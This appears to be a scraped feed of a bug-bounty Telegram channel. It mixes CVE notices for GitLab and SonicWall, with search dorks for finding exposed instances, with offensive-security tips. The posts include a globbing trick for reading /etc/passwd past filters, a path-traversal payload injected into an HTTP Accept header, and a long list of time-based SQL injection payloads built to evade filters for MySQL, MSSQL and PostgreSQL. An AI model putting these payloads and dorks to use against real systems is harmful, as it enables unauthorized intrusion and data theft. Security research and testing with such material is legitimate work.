CVE-2025-0314 and other: Multiple vulnerabilities in GitLab, 4.3 - 8.7 ratingβοΈ
In a recent advisory, GitLab writed about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.
Search at Netlas.io:
π Link: https://nt.ls/BNKS8
π Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
In a recent advisory, GitLab writed about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.
Search at Netlas.io:
π Link: https://nt.ls/BNKS8
π Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
π€4
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)Please open Telegram to view this post
VIEW IN TELEGRAM
π16π₯13β€1
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'Please open Telegram to view this post
VIEW IN TELEGRAM
β€20π₯16π³1
Where is the reaction guys? It's a good way to support the channel, so please do leave your reaction to grow this community. Thanks!
β οΈ Join Our Discussion Group - https://t.iss.one/brutsec
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Discussion
Community Discussion
β€16π³10π₯5
β‘Ultimate FFUF Cheat Sheet!
πhttps://medium.com/h7w/ultimate-ffuf-cheatsheet-advanced-fuzzing-tactics-for-pro-bug-hunters-492598750150
π
β€16π₯3π¨βπ»1
This media is not supported in your browser
VIEW IN TELEGRAM
Top 10 OffSec Certifications - Salary Wiseπ±
Please open Telegram to view this post
VIEW IN TELEGRAM
β€11
Use shell globbing / wildcard expansion. Here is an example
cat /e*c/p*s*d cat /etc/passwd. But how? Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
/e*c:
/p*s*d:Please open Telegram to view this post
VIEW IN TELEGRAM
π19π«‘7
CVE-2025-23006: Deserialization of Untrusted Data in SonicWall SMA1000, 9.8 rating π₯
A pre-authentication deserialization of untrusted data vulnerability was detected in SMA1000 components, which could allow an attacker to execute OS commands.
Search at Netlas.io:
π Link: https://nt.ls/FLFJT
π Dork: http.headers.server:"SMA"
Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002
A pre-authentication deserialization of untrusted data vulnerability was detected in SMA1000 components, which could allow an attacker to execute OS commands.
Search at Netlas.io:
π Link: https://nt.ls/FLFJT
π Dork: http.headers.server:"SMA"
Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002
π₯5β€3π3
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯6
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯12π8β€5
Intercept the request in Burp and replace the Accept header with:
Accept: ../../../../../../../../../../etc/passwd{{
../../../../../../e*c/p*s*d{{
Please open Telegram to view this post
VIEW IN TELEGRAM
1β€43π15π₯8π«‘4πΏ2
Brut Security
Drop Reactions β‘οΈ β‘οΈ β‘οΈ β‘οΈ β‘οΈ β‘οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
β€17π4π«‘4
Please open Telegram to view this post
VIEW IN TELEGRAM
Standoff365
BugBounty
Bug Bounty platform with generous rewards from the leading Russian companies Help companies find their flaws and get generous payouts. Max bounty: $660,000. Exclusive new scope. 100+ public programs. Fast payouts. Strong triage team
π₯4πΏ3
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
β€28π13